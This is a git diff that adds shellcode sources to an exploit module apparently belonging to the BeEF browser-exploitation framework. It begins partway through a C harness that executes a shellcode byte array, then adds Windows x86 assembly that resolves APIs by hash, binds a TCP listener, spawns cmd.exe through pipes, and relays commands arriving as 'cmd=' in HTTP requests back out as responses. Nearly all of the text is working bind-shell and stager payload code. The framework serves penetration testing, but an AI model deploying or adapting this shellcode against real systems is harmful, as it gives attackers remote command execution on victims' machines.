x53\x53\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC6\x6A\x00\x53\x50\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x57\x68\xC6\x96\x87\x52\xFF\xD5\x81\x3E\x63\x6D\x64\x3D\x74\x03\x46\xEB\xF5\x83\xC6\x04\xFF\xE6"; + +int main(int argc, char **argv) +{ +if (argc == 2){ + int port; + port = atoi(argv[1]); + if (port <= 0xFFFF){ + code[200] = ((port & 0xFF00) >> 8) & 0xFF; + code[201] = ((port & 0xFF)); + } +} + +int (*func)(); +func = (int (*)()) code; +(int)(*func)(); + return 0; +} diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_api.asm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_api.asm new file mode 100644 index 000000000..2acc13dde --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_api.asm @@ -0,0 +1,97 @@ +;-----------------------------------------------------------------------------; +; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com) +; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 +; Version: 1.0 (24 July 2009) +; Size: 137 bytes +;-----------------------------------------------------------------------------; + +[BITS 32] + +; Input: The hash of the API to call and all its parameters must be pushed onto stack. +; Output: The return value from the API call will be in EAX. +; Clobbers: EAX, ECX and EDX (ala the normal stdcall calling convention) +; Un-Clobbered: EBX, ESI, EDI, ESP and EBP can be expected to remain un-clobbered. +; Note: This function assumes the direction flag has allready been cleared via a CLD instruction. +; Note: This function is unable to call forwarded exports. + +api_call: + pushad ; We preserve all the registers for the caller, bar EAX and ECX. + mov ebp, esp ; Create a new stack frame + xor edx, edx ; Zero EDX + mov edx, [fs:edx+48] ; Get a pointer to the PEB + mov edx, [edx+12] ; Get PEB->Ldr + mov edx, [edx+20] ; Get the first module from the InMemoryOrder module list +next_mod: ; + mov esi, [edx+40] ; Get pointer to modules name (unicode string) + movzx ecx, word [edx+38] ; Set ECX to the length we want to check + xor edi, edi ; Clear EDI which will store the hash of the module name +loop_modname: ; + xor eax, eax ; Clear EAX + lodsb ; Read in the next byte of the name + cmp al, 'a' ; Some versions of Windows use lower case module names + jl not_lowercase ; + sub al, 0x20 ; If so normalise to uppercase +not_lowercase: ; + ror edi, 13 ; Rotate right our hash value + add edi, eax ; Add the next byte of the name + loop loop_modname ; Loop untill we have read enough + ; We now have the module hash computed + push edx ; Save the current position in the module list for later + push edi ; Save the current module hash for later + ; Proceed to itterate the export address table, + mov edx, [edx+16] ; Get this modules base address + mov eax, [edx+60] ; Get PE header + add eax, edx ; Add the modules base address + mov eax, [eax+120] ; Get export tables RVA + test eax, eax ; Test if no export address table is present + jz get_next_mod1 ; If no EAT present, process the next module + add eax, edx ; Add the modules base address + push eax ; Save the current modules EAT + mov ecx, [eax+24] ; Get the number of function names + mov ebx, [eax+32] ; Get the rva of the function names + add ebx, edx ; Add the modules base address + ; Computing the module hash + function hash +get_next_func: ; + jecxz get_next_mod ; When we reach the start of the EAT (we search backwards), process the next module + dec ecx ; Decrement the function name counter + mov esi, [ebx+ecx*4] ; Get rva of next module name + add esi, edx ; Add the modules base address + xor edi, edi ; Clear EDI which will store the hash of the function name + ; And compare it to the one we want +loop_funcname: ; + xor eax, eax ; Clear EAX + lodsb ; Read in the next byte of the ASCII function name + ror edi, 13 ; Rotate right our hash value + add edi, eax ; Add the next byte of the name + cmp al, ah ; Compare AL (the next byte from the name) to AH (null) + jne loop_funcname ; If we have not reached the null terminator, continue + add edi, [ebp-8] ; Add the current module hash to the function hash + cmp edi, [ebp+36] ; Compare the hash to the one we are searchnig for + jnz get_next_func ; Go compute the next function hash if we have not found it + ; If found, fix up stack, call the function and then value else compute the next one... + pop eax ; Restore the current modules EAT + mov ebx, [eax+36] ; Get the ordinal table rva + add ebx, edx ; Add the modules base address + mov cx, [ebx+2*ecx] ; Get the desired functions ordinal + mov ebx, [eax+28] ; Get the function addresses table rva + add ebx, edx ; Add the modules base address + mov eax, [ebx+4*ecx] ; Get the desired functions RVA + add eax, edx ; Add the modules base address to get the functions actual VA + ; We now fix up the stack and perform the call to the desired function... +finish: + mov [esp+36], eax ; Overwrite the old EAX value with the desired api address for the upcoming popad + pop ebx ; Clear off the current modules hash + pop ebx ; Clear off the current position in the module list + popad ; Restore all of the callers registers, bar EAX, ECX and EDX which are clobbered + pop ecx ; Pop off the origional return address our caller will have pushed + pop edx ; Pop off the hash value our caller will have pushed + push ecx ; Push back the correct return value + jmp eax ; Jump into the required function + ; We now automagically return to the correct caller... +get_next_mod: ; + pop eax ; Pop off the current (now the previous) modules EAT +get_next_mod1: ; + pop edi ; Pop off the current (now the previous) modules hash + pop edx ; Restore our position in the module list + mov edx, [edx] ; Get the next module + jmp short next_mod ; Process this module \ No newline at end of file diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_beef_bind-stage.asm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_beef_bind-stage.asm new file mode 100644 index 000000000..c88ab6e23 --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_beef_bind-stage.asm @@ -0,0 +1,177 @@ +;-----------------------------------------------------------------------------; +; Author: Ty Miller @ Threat Intelligence +; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 +; Version: 1.0 (2nd December 2011) +;-----------------------------------------------------------------------------; +[BITS 32] + +;INPUT: EBP is block_api. + +%include "src/block_virtualalloc.asm" + ; Input: None + ; Output: EAX holds pointer to the start of buffer 0x1000 bytes, EBX holds value 0x1000 + ; Clobbers: EAX, EBX, ECX, EDX + + mov esi, eax ; point esi to start of buffer, used as pseudo-frame pointer + +%include "src/block_pipes.asm" + ; Create pipes to redirect stage stdin, stdout, stderr + ; Input: EBP is api_call + ; Output: + ; esp+00 child stdin read file descriptor (inherited) + ; esp+04 child stdin write file descriptor (not inherited) + ; esp+08 child stdout read file descriptor (not inherited) + ; esp+12 child stdout write file descriptor (inherited) + ; esp+16 lpPipeAttributes structure (not used after block - 12 bytes) + ; Clobbers: EAX, EBX, ECX, EDI, ESP will decrement by 28 bytes + + mov edi,esi ; save esi since it gets clobbered + +%include "src/block_shell_pipes.asm" + ; Create process with redirected stdin, stdout, stderr to our pipes + ; Input: + ; EBP is api_call + ; esp+00 child stdin read file descriptor (inherited) + ; esp+04 not used + ; esp+08 not used + ; esp+12 child stdout write file descriptor (inherited) + ; Output: None. + ; Clobbers: EAX, EBX, ECX, EDX, ESI, ESP will also be modified + + mov esi,edi ; restore esi + +ReadLoop: ; Read output from the child process + +clear_buffer: + mov ecx,0xFF8 ; zero output buffer starting at esi+8 with 0xFF8 nulls + lea eax,[esi+8] ; point eax to start of command/output buffer +zero_buffer: + mov byte [eax],0 ; push a null dword + inc eax ; point to the next byte in the buffer + loop zero_buffer ; keep looping untill we have zeroed the buffer + + +response_headers: + push esi ; save pointer to start of buffer + lea edi,[esi+1048] ; set pointer to output buffer + call get_headers ; locate the static http response headers + db 'HTTP/1.1 200 OK', 0x0d, 0x0a, 'Content-Type: text/html', 0x0d, 0x0a, 'Access-Control-Allow-Origin: *', 0x0d, 0x0a, 'Content-Length: 3016', 0x0d, 0x0a, 0x0d, 0x0a +get_headers: + pop esi ; get pointer to response headers into esi + mov ecx, 98 ; length of http response headers + rep movsb ; move the http headers into the buffer + pop esi ; restore pointer to start of buffer + + +bind_port: + push esi ; save buffer pointer onto stack +%include "src/block_bind_tcp.asm" ;by here we will have performed the bind_tcp connection to setup our external web socket + ; Input: EBP must be the address of 'api_call'. + ; Output: EDI will be the newly connected clients socket + ; Clobbers: EAX, EBX, ESI, EDI, ESP will also be modified (-0x1A0) + + add esp, 0x1A0 ; restore stack pointer + pop esi ; restore buffer pointer + mov [esi], edi ; save external socket to buffer + + +recv: ; Receive the web request - must be a post request with command ending with a new line character + push byte 0 ; flags + push 0x400 ; allocated space for command (512 bytes) + mov ebx, esi ; start of our request/response memory buffer + add ebx, 8 ; start of our allocated command space + push ebx ; start of our allocated command space + push dword [esi] ; external socket + push 0x5FC8D902 ; hash( "ws2_32.dll", "recv" ) + call ebp ; recv( external_socket, buffer, size, 0 ); + +find_cmd: ; Search for "cmd=" in the web request + mov edx, [esp+0x64] ; stage stdin read file descriptor (40) + mov ecx, 0x400 ; set ecx to be our buffer counter +next: + cmp dword [ebx], 0x3d646d63 ; check if ebx points to "cmd=" + jz cmd_found ; if we found "cmd=" then parse the command + inc ebx ; point ebx to next char in request data + dec ecx ; dec our buffer counter + jecxz read_file_check ; if our counter is 0 then we found no command, so recv more data + jmp short next ; check next location for "cmd=" +cmd_found: ; now pointing to start of our command - MAY fail if the command is cut off + add ebx, 0x03 ; starts off pointing at "cmd=" so add 3 (plus inc eax below) to point to command + +next_cmd_char: + inc ebx ; move our command string pointer up one character + push ebx ; save command pointer to the stack + +write_file: + push 0 ; pOverlapped = NULL + lea edi,[esi+1040] ; 4 bytes for bytes written + push edi ; pBytesWritten + push 1 ; nBytesToWrite + push ebx ; command string in buffer + mov ebx,[esp+70h] ; Child stdin + push ebx ; child stdin + push 0x5BAE572D ; hash(kernel32.dll, WriteFile) + call ebp ; WriteFile + + pop ebx ; restore command pointer from the stack + cmp byte [ebx], 0x0a ; check if we have just sent a new line + jnz next_cmd_char ; if we haven't finished sending the cmd then send the next char, else we want to read the cmd output from internal stage socket + + +%include "src/block_sleep.asm" + ; Input: None + ; Output: None. Sleeps for x seconds + ; Clobbers: None + +read_file_check: + xor eax, eax ; zero eax + push eax ; lpBytesLeftThisMessage + lea ebx,[esi+4] ; address to output the result - num bytes available to read + push ebx ; lpTotalBytesAvail + push eax ; lpBytesRead + push eax ; nBufferSize + push eax ; lpBuffer + lea ebx,[esp+74h] ; child stdout read address + mov ebx, [ebx] ; child stdout read file descriptor + push ebx ; hNamedPipe + push 0xB33CB718 ; hash(kernel32.dll,PeekNamedPipe) + call ebp ; PeekNamedPipe + + test eax, eax ; check the function return correctly + jz close_handle ; no, then close the connection and start again + mov eax, [esi+4] ; Grab the number of bytes available + test eax, eax ; check for no bytes to read + jz close_handle ; no, then close the connection and start again + +read_file: + push 0 ; pOverlapped = NULL + lea edi,[esi+1044] ; output: number of bytes read + push edi ; pBytesRead + push 0xB86 ; BytesToRead: remaining space in our allocated buffer + ;lea edi,[esi+1114] ; start of remaining space in buffer after response headers + lea edi,[esi+1146] ; start of remaining space in buffer after response headers + push edi ; start of remaining space in buffer after response headers + lea ebx,[esp+70h] ; child stdout read address + mov ebx, [ebx] ; child stdout read file descriptor + push ebx ; hFile: child stdout address + push 0xBB5F9EAD ; hash(kernel32.dll,ReadFile) + call ebp ; ReadFile + + +send_output: ; send buffer to the external socket + push byte 0 ; flags + push 0xBE8 ; len + lea edi,[esi+1048] ; start of output buffer + push edi ; pointer to buffer + push dword [esi] ; external socket + push 0x5F38EBC2 ; hash ( "ws2_32.dll", "send" ) + call ebp ; send(external_socket, *buf, len, flags); + + +close_handle: + push dword [esi] ; hObject: external socket + push 0x528796C6 ; hash(kernel32.dll,CloseHandle) + call ebp ; CloseHandle + + jmp ReadLoop + diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_beef_bind-stager.asm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_beef_bind-stager.asm new file mode 100644 index 000000000..50059ad2e --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_beef_bind-stager.asm @@ -0,0 +1,47 @@ +;-----------------------------------------------------------------------------; +; Author: Ty Miller @ Threat Intelligence +; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 +; Version: 1.0 (2nd December 2011) +;-----------------------------------------------------------------------------; +[BITS 32] + +;INPUT: EBP is block_api. + +%include "src/block_bind_tcp.asm" ;by here we will have performed the bind_tcp connection to setup our external web socket + ; Input: EBP must be the address of 'api_call'. + ; Output: EDI will be the newly connected clients socket + ; Clobbers: EAX, EBX, ESI, EDI, ESP will also be modified (-0x1A0) + +%include "src/block_virtualalloc.asm" + ; Input: None + ; Output: EAX holds pointer to the start of buffer 0x1000 bytes, EBX has value 0x1000 + ; Clobbers: EAX, EBX, ECX, EDX + + mov esi, eax ; save pointer to buffer since eax gets clobbered + +recv: ; Receive the web request containing the stage + push byte 0 ; flags + push ebx ; allocated space for stage + push eax ; start of our allocated command space + push edi ; external socket + push 0x5FC8D902 ; hash( "ws2_32.dll", "recv" ) + call ebp ; recv( external_socket, buffer, size, 0 ); + + +close_handle: + push edi ; hObject: external socket + push 0x528796C6 ; hash(kernel32.dll,CloseHandle) + call ebp ; CloseHandle + +find_cmd: ; Search for "cmd=" in the web request for our payload + cmp dword [esi], 0x3d646d63 ; check if ebx points to "cmd=" + jz cmd_found ; if we found "cmd=" then parse the command + inc esi ; point ebx to next char in request data + jmp short find_cmd ; check next location for "cmd=" +cmd_found: ; now pointing to start of our command - MAY fail if the command is cut off +; add esi,4 ; starts off pointing at "cmd=" so add 3 (plus inc eax below) to point to command ... this compiles to 6 byte opcode + db 0x83, 0xC6, 0x04 ; add esi,4 ... but only 3 byte opcode + + jmp esi ; jump to our stage payload + + diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_bind_tcp.asm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_bind_tcp.asm new file mode 100644 index 000000000..3ac5f8c70 --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_bind_tcp.asm @@ -0,0 +1,63 @@ +;-----------------------------------------------------------------------------; +; Author: Stephen Fewer (stephen_fewer@harmonysecurity.com) +; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 +; Version: 1.0 (24 July 2009) +;-----------------------------------------------------------------------------; +[BITS 32] + +; Input: EBP must be the address of 'api_call'. +; Output: EDI will be the newly connected clients socket +; Clobbers: EAX, EBX, ESI, EDI, ESP will also be modified (-0x1A0) + +bind_tcp: + push 0x00003233 ; Push the bytes 'ws2_32',0,0 onto the stack. + push 0x5F327377 ; ... + push esp ; Push a pointer to the "ws2_32" string on the stack. + push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" ) + call ebp ; LoadLibraryA( "ws2_32" ) + + mov eax, 0x0190 ; EAX = sizeof( struct WSAData ) + sub esp, eax ; alloc some space for the WSAData structure + push esp ; push a pointer to this stuct + push eax ; push the wVersionRequested parameter + push 0x006B8029 ; hash( "ws2_32.dll", "WSAStartup" ) + call ebp ; WSAStartup( 0x0190, &WSAData ); + + push eax ; if we succeed, eax wil be zero, push zero for the flags param. + push eax ; push null for reserved parameter + push eax ; we do not specify a WSAPROTOCOL_INFO structure + push eax ; we do not specify a protocol + inc eax ; + push eax ; push SOCK_STREAM + inc eax ; + push eax ; push AF_INET + push 0xE0DF0FEA ; hash( "ws2_32.dll", "WSASocketA" ) + call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 ); + xchg edi, eax ; save the socket for later, don't care about the value of eax after this + + xor ebx, ebx ; Clear EBX + push ebx ; bind to 0.0.0.0 + push 0x5C110002 ; family AF_INET and port 4444 + mov esi, esp ; save a pointer to sockaddr_in struct + push byte 16 ; length of the sockaddr_in struct (we only set the first 8 bytes as the last 8 are unused) + push esi ; pointer to the sockaddr_in struct + push edi ; socket + push 0x6737DBC2 ; hash( "ws2_32.dll", "bind" ) + call ebp ; bind( s, &sockaddr_in, 16 ); + + push ebx ; backlog + push edi ; socket + push 0xFF38E9B7 ; hash( "ws2_32.dll", "listen" ) + call ebp ; listen( s, 0 ); + + push ebx ; we set length for the sockaddr struct to zero + push ebx ; we dont set the optional sockaddr param + push edi ; listening socket + push 0xE13BEC74 ; hash( "ws2_32.dll", "accept" ) + call ebp ; accept( s, 0, 0 ); + + push edi ; push the listening socket to close + xchg edi, eax ; replace the listening socket with the new connected socket for further comms + push 0x614D6E75 ; hash( "ws2_32.dll", "closesocket" ) + call ebp ; closesocket( s ); + diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_pipes.asm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_pipes.asm new file mode 100644 index 000000000..941564c34 --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_pipes.asm @@ -0,0 +1,64 @@ +;-----------------------------------------------------------------------------; +; Author: Ty Miller @ Threat Intelligence +; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 +; Version: 1.0 (2nd December 2011) +;-----------------------------------------------------------------------------; +[BITS 32] + +; Input: EBP is api_call +; Output: +; esp+00 child stdin read file descriptor (inherited) +; esp+04 child stdin write file descriptor (not inherited) +; esp+08 child stdout read file descriptor (not inherited) +; esp+12 child stdout write file descriptor (inherited) +; esp+16 lpPipeAttributes structure (not used after block - 12 bytes) +; Clobbers: EAX, EBX, ECX, EDI, ESP will decrement by 28 bytes + + push 1 ; create lpPipeAtrributes structure on stack so pipe handles are inherited + push 0 + push 0x0C + +create_pipe_stdout: + push 0 ; allocate space on stack for child stdout file descriptor + mov ebx, esp ; save location of where the child stdout Write file descriptor will be + push 0 ; allocate space on stack for child stdout file descriptor + mov ecx, esp ; save location of where the child stdout Read file descriptor will be + + push 0 ; nSize + lea edi,[esp+12] ; lpPipeAttributes - inherited + push edi + push ebx ; stdout write file descriptor + push ecx ; stdout read file descriptor + push 0x0EAFCF3E ; hash ( "kernel.dll", "CreatePipe" ) + call ebp ; CreatePipe( Read, Write, 0, 0 ) + +create_pipe_stdin: + push 0 ; allocate space on stack for child stdout file descriptor + mov ebx, esp ; save location of where the child stdout Write file descriptor will be + push 0 ; allocate space on stack for child stdout file descriptor + mov ecx, esp ; save location of where the child stdout Read file descriptor will be + + push 0 ; nSize + lea edi,[esp+20] ; lpPipeAttributes - inherited + push edi + push ebx ; stdout write file descriptor + push ecx ; stdout read file descriptor + push 0x0EAFCF3E ; hash ( "kernel.dll", "CreatePipe" ) + call ebp ; CreatePipe( Read, Write, 0, 0 ) + +no_inherit_read_handle: ; ensure read and write handles to child proc pipes for are not inherited + mov ebx,[esp+8] + push 0 + push 1 + push ebx ; hChildStdoutRd is the address we set in the CreatePipe call + push 0x1CD313CA ; hash(kernel32.dll, SetHandleInformation) + call ebp ; SetHandleInformation + +no_inherit_write_handle: + mov ebx,[esp+4] + push 0 + push 1 + push ebx ; hChildStdinRw is the address we set in the CreatePipe call + push 0x1CD313CA ; hash(kernel32.dll, SetHandleInformation) + call ebp ; SetHandleInformation + diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_shell_pipes.asm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_shell_pipes.asm new file mode 100644 index 000000000..33e807866 --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_shell_pipes.asm @@ -0,0 +1,56 @@ +;-----------------------------------------------------------------------------; +; Author: Ty Miller @ Threat Intelligence +; Credits: Some code borrowed from block_shell.asm; Stephen Fewer +; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 +; Version: 1.0 (2nd December 2011) +;-----------------------------------------------------------------------------; +[BITS 32] + +; Input: +; EBP is api_call +; esp+00 child stdin read file descriptor (inherited) +; esp+04 not used +; esp+08 not used +; esp+12 child stdout write file descriptor (inherited) +; Output: None. +; Clobbers: EAX, EBX, ECX, EDX, ESI, ESP will also be modified + +shell: + push 0x00646D63 ; push our command line: 'cmd',0 + mov ebx, esp ; save a pointer to the command line + push dword [esp+16] ; child stdout write file descriptor for process stderr + push dword [esp+20] ; child stdout write file descriptor for process stdout + push dword [esp+12] ; child stdin read file descriptor for process stdout + xor esi, esi ; Clear ESI for all the NULL's we need to push + push byte 18 ; We want to place (18 * 4) = 72 null bytes onto the stack + pop ecx ; Set ECX for the loop +push_loop: ; + push esi ; push a null dword + loop push_loop ; keep looping untill we have pushed enough nulls + mov word [esp + 60], 0x0101 ; Set the STARTUPINFO Structure's dwFlags to STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW + lea eax, [esp + 16] ; Set EAX as a pointer to our STARTUPINFO Structure + mov byte [eax], 68 ; Set the size of the STARTUPINFO Structure + ; perform the call to CreateProcessA + push esp ; Push the pointer to the PROCESS_INFORMATION Structure + push eax ; Push the pointer to the STARTUPINFO Structure + push esi ; The lpCurrentDirectory is NULL so the new process will have the same current directory as its parent + push esi ; The lpEnvironment is NULL so the new process will have the same enviroment as its parent + push esi ; We dont specify any dwCreationFlags + inc esi ; Increment ESI to be one + push esi ; Set bInheritHandles to TRUE in order to inheritable all possible handle from the parent + dec esi ; Decrement ESI back down to zero + push esi ; Set lpThreadAttributes to NULL + push esi ; Set lpProcessAttributes to NULL + push ebx ; Set the lpCommandLine to point to "cmd",0 + push esi ; Set lpApplicationName to NULL as we are using the command line param instead + push 0x863FCC79 ; hash( "kernel32.dll", "CreateProcessA" ) + call ebp ; CreateProcessA( 0, &"cmd", 0, 0, TRUE, 0, 0, 0, &si, &pi ); + ; perform the call to WaitForSingleObject +; mov eax, esp ; save pointer to the PROCESS_INFORMATION Structure +; dec esi ; Decrement ESI down to -1 (INFINITE) +; push esi ; push INFINITE inorder to wait forever +; inc esi ; Increment ESI back to zero +; push dword [eax] ; push the handle from our PROCESS_INFORMATION.hProcess +; push 0x601D8708 ; hash( "kernel32.dll", "WaitForSingleObject" ) +; call ebp ; WaitForSingleObject( pi.hProcess, INFINITE ); + diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_sleep.asm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_sleep.asm new file mode 100644 index 000000000..4d3b57ce2 --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_sleep.asm @@ -0,0 +1,15 @@ +;-----------------------------------------------------------------------------; +; Author: Ty Miller @ Threat Intelligence +; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 +; Version: 1.0 (2nd December 2011) +;-----------------------------------------------------------------------------; +[BITS 32] + +; Input: None +; Output: None. Sleeps for specified seconds. +; Clobbers: None + + push 1000 ; milliseconds + push 0xE035F044 ; hash (kernel32.dll, Sleep) + call ebp ; Sleep(1000ms) + diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_virtualalloc.asm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_virtualalloc.asm new file mode 100644 index 000000000..f12b2f17c --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_virtualalloc.asm @@ -0,0 +1,20 @@ +;-----------------------------------------------------------------------------; +; Author: Ty Miller @ Threat Intelligence +; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 +; Version: 1.0 (2nd December 2011) +;-----------------------------------------------------------------------------; +[BITS 32] + +; Input: None +; Output: EAX holds pointer to the start of buffer 0x1000 bytes, EBX holds value 0x1000 +; Clobbers: EAX, EBX, ECX, EDX + + mov ebx,0x1000 ; setup our flags and buffer size in ebx +allocate_memory: ; Alloc a buffer for the request and response data + push byte 0x40 ; PAGE_EXECUTE_READWRITE - don't need execute but may as well + push ebx ; MEM_COMMIT + push ebx ; size of memory to be allocated (4096 bytes) + push byte 0 ; NULL as we dont care where the allocation is + push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" ) + call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); +